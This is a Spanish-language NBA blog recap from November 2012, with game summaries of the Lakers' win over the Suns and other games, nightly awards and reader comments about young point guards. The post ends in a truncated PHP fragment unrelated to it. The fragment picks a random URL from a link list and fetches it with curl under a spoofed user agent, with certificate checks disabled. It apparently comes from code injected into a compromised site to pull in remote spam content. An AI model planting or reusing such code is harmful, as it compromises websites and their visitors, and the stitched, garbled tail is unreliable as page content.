La Crónica: Vuelve el ‘showtime’

17 de November de 2012 por Sancho88

Velada muy especial en el Forum… esto, en el Staples Center de Los Ángeles. Los Lakers recuperaron las buenas sensaciones en su feudo frente a los Phoenix Suns (102-114) el día en el que se rendía homenaje a uno de los dioses mayores de la franquicia, Kareem Abdul-Jabbar, quien ya tiene su preciosa estatua en el Staples. Mike D’Antoni vio el partido desde el vestuario, pero a buen seguro que se sentirá orgulloso del resultado final. No obstante, él mismo había prometido un mayor rendimiento ofensivo, y eso es precisamente lo que llevaron a cabo sus pupilos, todavía dirigidos por el extravagante Bickerstaff. De la mano de un Kobe Bryant desatado, con 31 puntos y 6 asistencias, Lakers se escapó a falta de 2 minutos para el final del 3º cuarto con el 84-84, encadenando un parcial de 12-0 que los Suns ya no pudieron alcanzar. Kobe tuvo un escudero inesperado en MWP. El loco se fue hasta los 22 puntos con 5/10 en triples, 6 rebotes y 3 robos, mientras que Pau también se unió a la fiesta con un doble-doble (16-10), 12 de ellos en el primer cuarto del partido. Si anota 12 puntos o más el domingo frente a los Rockets alcanzará los 15.000 puntos en su carrera profesional. Howard, por su parte, mantuvo una bonita batalla bajo los tableros con el siempre inconsistente  Jermaine O’Neal y firmó 18 puntos, 12 rebotes y 4 tapones. Con el bloque principal rindiendo a buen nivel, a la espera de la vuelta de Nash -quien podría volver a finales de la semana que viene- ya se vieron buenos apuntes desde el banquillo. D’Antoni apostó por una rotación consistente de 9 hombres, con Jamison, Hill, Duhon y Meeks jugando bastantes minutos, y Hill demostrando que merece jugar más. Por parte de los Suns, Dragic sumó 22 puntos y 7 asistencias, mientras que el argentino Luis Scola se fue hasta los 18 puntos y 8 rebotes. Beasley se quedó solo en 14 puntos, pero se unió a la metamorfosis ‘kafkiana’ de Peace y consiguió un hito nunca visto en su dilatada carrera: 9 asistencias. Ale, a ver quién le llama egoísta a partir de hoy. 

En el otro partido morboso de la madrugada, los Knicks por fin perdieron, esta vez frente a los Grizzlies (95-105), que encadenaron su séptima victoria consecutiva y ya son el mejor equipo de la liga (7-1). Entre Marc y Z-Bo se zamparon en la zona a los Knicks. Marc sumó 24 puntos y 7 rebotes, mientras que Randolph se fue hasta los 20 puntos y 15 rebotes, números que no pudieron igualar los de Manhattan, y es que Carmelo con 20 puntos y Felton con 18 estuvieron demasiado solos. Sin noticias de Chandler y de la pintura de los Knicks; además JR Smith perdió por fin el oremus tras muchos partidos siendo persona y se enzarzó a empujones con Bayless, además de sacar el garrote contra Allen. Se le echaba de menos en el apartado ‘blackout’. Imparables los oseznos por los que muchos no dábamos ni un duro a principios de temporada.

En Minnesota los mermados Wolves no pudieron contra los Warriors (106-98), a pesar del debut discreto de Josh Howard. Sin un posible quinteto inicial más sexto hombre fuera por lesiones (Ricky-Roy-Budinger-Love-Pekovic / Barea), los lobos cayeron con orgullo frente al ataque coral de los Warriors -hasta 6 hombres en dobles figuras- con David Lee tirando del carro, 18-13 y el rookie Harrison Barnes jugando un partido como los mayores, 18-9. Por parte de los Wolves destacaron Derrick Williams, 23-7-4 (tapones) y Aleksey Shved, quien se picó en el duelo de ‘rookies’ frente a Barnes y alcanzó su mejor marca personal en anotación en la NBA: 22 puntos y 7 asistencias. Tirón de orejas para el escritor, que siempre ha dicho que este hombre era ‘chuponcete’. Entre él y Beasley dominarán la solidaridad en el mundo. Lo estoy viendo.

En el madrugador Este, por su parte, sorprendente victoria con remontada incluida de los Magic en Detroit (110-106), con reaparición de nuestro querido e idolatrado Jameer Nelson, quien firmó un doble-doble de calidad: 13 puntos y 10 asistencias, bien aprovechadas por sus compañeros. Redick fue el mejor del partido con 23 puntos, y en los Pistons Monroe se quedó una vez más solito con 23 puntos y 7 rebotes. En ‘Motown’ siguen haciendo el ridículo noche tras noche, el 1-9 de parcial les otorga cierto aire de ‘loosers’ a lo grande. Veremos si van a por la gesta de los Bobcats 2011-2012.

Indiana por fin ganó un partido contra alguien, y Hibbert renació de donde se encontrara enterrado. El (83-103) final contra los Mavericks parece incluso un palizón, teniendo en cuenta los bajos guarismos del hasta anoche peor equipo ofensivo de la liga. Funcionó por fin el quinteto de Vogel y desde el banquillo sorprendieron los 14 puntos de Sam Young. En los ‘Mavs’ volvió Shawn Marion tras su esguince de rodilla y solo Mayo rindió a buen nivel con 19 puntos. Su equipo, sin embargo, sigue deambulando como alma en pena, o como Alemania sin Nowitzki, o como NBA sin Dirk… en fin.

En Philly Jrue Holiday se marcó un partido de los suyos, con un impecable 8/10 en tiros de campo al descanso que al final se quedaron en un rácano 10/21 para darle la victoria a los Sixers (93-99). No obstante, fue el mejor de su equipo con 26 puntos, junto a los 5 triples, 20 puntos y 8 rebotes de J-Rich, que completó una primera parte sensacional. En los Jazz más de lo mismo, ración de pívots, parejita Jefferson-Millsap, quienes esta vez no llegaron al doble-doble, y expectación por un hombrecillo rastafari llamado Demarre Carroll que con sus 17 puntos desde el banquillo acongojó a los Sixers al final del partido, cuando tenían casi todo el pescado vendido. No obstante, no hace falta seguirle la pista. Se le apareció la virgen simplemente.

En el resto de partidos, los Thunder se zamparon a los Hornets en tan solo medio tiempo y luego se dejaron ir (110-95). Durant y Martin ajusticiaron a los pobrecicos abejorros con 27 puntos cada uno y Westbrook los alimentó con 12 asistencias.

En Porltand los Blazers ganaron tras una prórroga a los Rockets (117-119), con un excepcional Nicolas Batum, con 35 puntos y 5 triples, y con unos no menos increíbles Aldridge y Lillard, con 29 y 27 puntos respectivamente. Los dos quintetos que se juegan la minutada padre en la NBA demostraron por qué lo hacen, y es que sus banquillos dieron mucha pena, excepto el gemelo Marcus Morris para los Rockets. Harden se fue hasta los 29 puntos, pero falló en su penetración final taponado por Batum y una canasta previa de Aldridge dejaron su partidazo en agua de borrajas.

Para terminar, en Sacramento el trío de los Hawks Horford-Korver-Lou Williams anotaron más de 20 puntos por cabeza y se comieron a los deprimentes Kings en el tercer cuarto (112-96). Volvió Cousins con 9 discretos puntos y 16 rebotes, pero solo Jason Thompson con 19 puntos y 10 rebotes le ayudó, además de Thornton con 17 puntos.

PREMIOS

MVP: Nadie estuvo tan inconmensurable anoche como Nicolas Batum. El alero francés de los Blazers se fue hasta los 35 puntos, 5/8 en triples, 5 tapones, 6 rebotes y4 asistencias en la victoria en el Rose Garden contra los Rockets. Símplemente imparable. El 31-6 de Bryant también merece mención aparte, pero nos quedamos con Batum.

Rookie: Buena jornada para los ‘rookies’. Damian Lillard fue el mejor con 27 puntos, 5 rebotes y 5 asistencias. Se postula para el ROY en una batalla encarnizada con Anthony Davis, quien ayer estuvo discretito (8-11) en la derrota frente a los Thunder. Shved con 22 puntos y 7 asistencias, y Barnes con 18-9 también cuajaron buenos partidos.

Sorpresa: A sus pies, majestad de la locura. Metta World Peace anotó 22 puntos, con 5 triples, 6 rebotes, 3 asistencias y 3 robos de balón. Eso no se ve todos los días. Los 17 puntos de Carroll o los 14 de Sam Young tampoco.

Decepción: El 7-7 de Tyson Chandler en la derrota de los Grizzlies se lleva la palma. el 3-7 de Hickson o el 2-7 de Shawn Marion no le van a la zaga.

Esfuerzo en vano: Los 29 puntos, 6 rebotes, 6 asistencias y 3 robos de balón de James Harden se llevan el premio esta noche. McHale sigue con la explotación laboral de su quinteto, que curran como chinos. También se esforzó en vano como siempre Greg Monroe con 23 puntos y 7 rebotes.

 TOP-10

Comenta

17 comentarios a esta entrada

  1. rumbero dice:
    #1

    Que gozada estos Grizzlies, no los había visto hasta ahora. Con Marc en su línea y Randolph ya por fin en modo destructor después de su lesión dan miedito. Si tienen claro durante toda la temporada que este equipo nace y muere con estos dos tios y no con los tiros de Gay se pueden merendar a cualquiera. Puede dar fe la pintura de los Knicks. No sé quien comentaba por aquí no hace mucho lo que sufría Chandler con los pívots a la europea, pues ayer las pasó canutas con Marc..aunque tampoco debería extrañar mucho. El resto más fallones en el tiro de lo que venían enseñando desde el comienzo (algo normal tb que venian tirando un 40 y pico % desde el triple). Lo mejor de todo ver a Sheed separando a JR con su trifulca con Baylees. ¿A esto tio nos lo han cambiado o estará cambiando con la edad? Viva los clásicos!

      Citar

  2. Chipi dice:
    #2

    Alucinante el destrozo que Marc & Randolph les han hecho a los Knicks en el tercer cuarto. No los paraba ni Cristo.

    Aún no he podido ver a los Lakers post-Potato. ¿Por qué se califica de extravagante a Bickerstaff?

      Citar

  3. Sancho88 dice:
    #3

    Mirale sus ruedas de prensa y lo entenderás…. jejej

      Citar

  4. Esteban dice:
    #4

    FELICITACIONES SANCHO88, UN TRABAJO INCREIBLE, SE NOTA QUE LE HAS PUEStO DEDICACION

    muchos partidos y muchas cosas para destacar, pero principalmente hay una que esta pasando casi desapercibido y es LILLARD

    no tiene el reconocimiento que merece por estar al lado de DAVIS, pero madre, si vieramos todo lo que hablamos sobre irving y rubio el año pasado y lo poco que se habla de lillard, parecemos tontos, LILLARD ES MEJOR QUE AMBOS JUNTOS
    juega en un equipo competitivo y es base titular inamobible, PROMEDIA MAS PUNTOS QUE IRVING EN SU AÑO ROOKIE Y LAS MISMAS ASISTENCIAS QUE RUBIO

    un verdadero CRACK

      Citar

  5. Esteban dice:
    #5

    ah tambien vale hablar del nivel de sheed WALLACE, algo impresionante, despues de casi dos años sin jugar, vuelve y domina a todos en el poste bajo

    los viejos rockeros nunca mueren!!

      Citar

  6. HisRoyalAirness dice:
    #6

    Esteban pero es que lo Irving y Ricky el año pasado no eran sólo números, cambiaron la dinámica de sus equipos por completo.

    Estoy viendo estas últimas semanas unas fintas de Marc en el poste bajo que me recuerdan mucho a Hakeem (salvando las distancias).

    Buen trabajo Sancho! Pero para loco tú jajaja

      Citar

  7. safd dice:
    #7

    lillard tiene 2 años mas q irving, asiq la comparacion tiene q ser con el irving de dentro de 2 temporadas… estoy totalmente seguro q ni los wolves ni los cavs cambiarian ni a ricky ni a irving por lillard, y ojo, me parece un jugon tb

      Citar

  8. MagicJohnson32 dice:
    #8

    Ahora mismo entre los bases jóvenes está primero Irving y después todos los demás. Dicho lo cual, Lillard apunta a súper estrella.

      Citar

  9. HisRoyalAirness dice:
    #9

    MagicJohnson32:
    Ahora mismo entre los bases jóvenes está primero Irving y después todos los demás. Dicho lo cual, Lillard apunta a súper estrella.

    Pero es que Irving no es un base al uso, es un 1 y medio de los que salen ahora tantos.
    Como base puro, y no digo que sea mejor, creo que Ricky está por delante? Por supuesto que Kyrie es más jugador

      Citar

  10. Sancho88 dice:
    #10

    Irving es mejor que Ricky y que Lillard. Pero ojo con Jennings, también muy joven y acojonantemente bueno. Para mí el mejor base del curso hasta el momento

      Citar

  11. rumbero dice:
    #11

    Pues siguiendo con bases al uso y de tios que han empezado bien tenemos a Rondo, que era duda para hoy y lleva 8 asistencias en 11 minutos. Y un 2/2 para adornar. Que jugón

      Citar

  12. melo15 dice:
    #12

    El que ha mejorado muchisimo es Jrue Holiday, el chaval esta en 19-9 y ahora mismo es el unico que sostiene a los Sixers. Parece que los Sixers no se equivocaban al decir que Iguodala tapaba a Holiday, con Jennings, Mayo y DeRozan las sorpresas de esta temporada.

      Citar

  13. txusma dice:
    #13

    Rondo acaba el partido con 20 asistencias y 6 puntitos. Ahora mismo no recuerdo la cifra de partidos consecutivos por encima de las 10 asistencias pero creo q superaba la treintena. Crack!
    Y lo de Holiday lo comentaba yo. El año pasado fue decepcionante pq se esperaba más de él pero este ha asumido plenamente los galones, al menos hasta la llegada de Bynum. Además creo q con él en pista aún le podría ir mejor.

      Citar

  14. rumbero dice:
    #14

    Creo que van 33.
    Y otra estadistica. Quinto jugador desde el 85 en conseguir 20 asistencias en menos de 33 minutos. Los otros 4:Magic,Stockton,Nash y Kidd. Pues eso

      Citar

  15. Sancho88 dice:
    #15

    Rajon Rondo y Doc Rivers son el BALONCESTO MUNDIAL ahora mismo

      Citar

  16. Esteban dice:
    #16

    Bueno, es verdad, se me habia pasado el tema de la edad y el hecho q irving solo jugo 16 partidos en la universidad, pero bueno, irving pinta para candidato a MVP, es cierto,

    Hablando de cavs, deben ser el unico equipo q poierde pierde y pierde y sus fans no estan enojados, cojonudos rendimientos de irving, thompson y waiters, un trio donde cimentar un futuro muy dulce

    Grandisima decepcion a mi gusto la de jeff green hasta el momento, cuando hara algun juego decente? Era el arma secreta de los celtics y parece sin municion, para colmo le han hecho un contratazo!!
    La clasica, el error no asumido, angie carga con el traspaso de perkins por el, y le renovo a fin de demostrar q no estaba equivocado, pero semejante contrato luego de un año en blanco no se justifica

      Citar

  17. simon dice:
    #17

    A mi Jeff Green nunca me ha parecido un buen jugador, mas bien normalito sin ninguna virtud a destacar. Como mucho un buen suplente ( tampoco de los mejores ) o un titular normalito tirando a perfil bajo. Demasiado lento para los aleros y bajo y le falta algo de fuerza para los 4… y encima sin un gran tiro a media distancia o exterior con el que sacar a los grandotes de la zona cuando le toca jugar de interior… para mi ese contrato ha sido la mayor cagada de Ainge en los ultimos años… y lo van a pagar en el futuro.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>